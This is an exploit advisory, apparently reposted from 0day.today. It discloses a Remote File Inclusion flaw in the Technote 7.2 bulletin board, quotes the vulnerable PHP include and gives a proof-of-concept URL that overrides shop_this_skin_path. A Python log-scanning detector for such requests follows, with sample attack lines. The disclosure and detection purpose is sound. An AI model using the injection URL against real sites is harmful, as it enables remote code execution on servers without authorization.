Technote 7.2 Remote File Inclusion Vulnerability

Date: 03 Feb 2009 00:00:00
Reported by: make0day
Type: zdt
Source: 0day.today

Remote File Inclusion Vulnerability in Technote 7.

================================================
Technote 7.2 Remote File Inclusion Vulnerability
================================================


/*************************

TECHNOTE (version 7.2 (08.09.25)) is a bulletin board system from Korea.
It is freely available for all platforms that support PHP and MySQL.
But I found a Remote File Inclusion vulnerability.
Here are the details:

**************************/
TESTED ON VERSION TECHNOTE 7.2 (08.09.25)
Download : http://www.technote.co.kr/
/***************************
Remote File Inclusion Vulnerability

/body_default.php

if($GOODS['gs_input']) include "$shop_this_skin_path/2_view_body/include/form_option.php";
//File Include

*************************/

poc:

http://[site]/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=[RFI]
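
Added example (not part of the original advisory or of Technote's code): a check a defender could run over web-server access logs to find requests that set the shop_this_skin_path variable named above from the query string. It assumes Common/Combined Log Format and that a client never legitimately supplies this variable; the log lines, addresses and host are constructed.

```python
import re
from urllib.parse import parse_qsl

# Internal skin variable named in the advisory; a client has no reason to send it.
INTERNAL_VAR = "shop_this_skin_path"
# URL scheme / PHP stream wrapper prefix, or a UNC-style path.
REMOTE_VALUE = re.compile(r"^(?:[a-z][a-z0-9+.\-]*:|//|\\\\)", re.I)
# Request field of a Common/Combined Log Format line.
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

def php_var_name(raw_name):
    """Normalise a request parameter name roughly the way PHP does."""
    base = raw_name.lstrip().split("[", 1)[0]   # GOODS[no] -> GOODS
    return re.sub(r"[ .]", "_", base)           # PHP maps ' ' and '.' to '_'

def classify(log_line):
    """Return None, 'param-override' or 'remote-include' for one log line."""
    m = REQUEST.search(log_line)
    if not m:
        return None
    query = m.group(1).partition("?")[2]
    verdict = None
    # parse_qsl percent-decodes names and values before they are compared.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if php_var_name(name) != INTERNAL_VAR:
            continue
        if REMOTE_VALUE.match(value.strip()):
            return "remote-include"
        verdict = "param-override"
    return verdict

# Constructed sample lines (documentation addresses, placeholder host).
SKIN = "/skin_shop/standard/2_view_body/body_default.php"
SAMPLE_LOG = [
    '192.0.2.10 - - [03/Feb/2009:10:00:01 +0900] "GET /index.php?page=1 HTTP/1.1" 200 5120',
    f'192.0.2.44 - - [03/Feb/2009:10:02:17 +0900] "GET {SKIN}?GOODS[no]=1&GOODS[gs_input]=1'
    '&shop_this_skin_path=http://example.invalid/x HTTP/1.1" 200 312',
    f'192.0.2.44 - - [03/Feb/2009:10:02:19 +0900] "GET {SKIN}?GOODS%5Bgs_input%5D=1'
    '&shop_this_skin_path=%68ttp%3A%2F%2Fexample.invalid%2Fx HTTP/1.1" 200 312',
    f'192.0.2.61 - - [03/Feb/2009:10:05:40 +0900] "GET {SKIN}?shop_this_skin_path=skins/alt HTTP/1.1" 200 0',
]

def scan(lines):
    """Return (client_ip, verdict) for every flagged line."""
    return [(l.split(" ", 1)[0], v) for l in lines if (v := classify(l))]

if __name__ == "__main__":
    for ip, verdict in scan(SAMPLE_LOG):
        print(ip, verdict)
```

Access logs record only the query string, so the same variable arriving in a POST body or cookie needs a separate check at the application or WAF layer.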



#  0day.today [2018-04-08]  #
